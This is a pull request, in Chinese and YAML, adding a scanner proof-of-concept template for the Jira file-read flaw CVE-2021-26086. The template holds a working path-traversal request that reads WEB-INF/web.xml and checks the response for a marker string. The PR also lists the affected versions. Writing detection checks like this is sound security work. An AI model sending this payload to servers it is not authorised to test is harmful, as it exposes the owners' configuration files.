### PR TITLE
Create Jira文件读取-CVE-2021-26086

### DIFF
--- a/pocs/jira-limited-file-read-cve-2021-26086.yml
+++ b/pocs/jira-limited-file-read-cve-2021-26086.yml
@@ -1,0 +1,11 @@
+name: poc-yaml-jira-limited-file-read-cve-2021-26086
+groups:
+  linux1:
+    - method: GET
+      path: /s/xxx/_/;/WEB-INF/web.xml
+      expression: |
+        response.status == 200 && response.body.bcontains(b"JiraImportProgressFilter")
+detail:
+  author: fuzz7j(https://github.com/fuzz7j)
+  links:
+    - https://xz.aliyun.com/t/10109


### PR DESCRIPTION
## 本 poc 是检测什么漏洞的
Jira 文件读取-CVE-2021-26086
## 测试环境
https://github.com/vulhub/vulhub/tree/master/jira/CVE-2019-11581
## 备注
Affected versions:
version < 8.5.14
8.6.0 ≤ version < 8.13.6
8.14.0 ≤ version < 8.16.1

<img width="572" alt="jira" src="https://user-images.githubusercontent.com/87168863/131446938-d6084f51-dae6-47e9-8279-a1b8a08fba79.png">
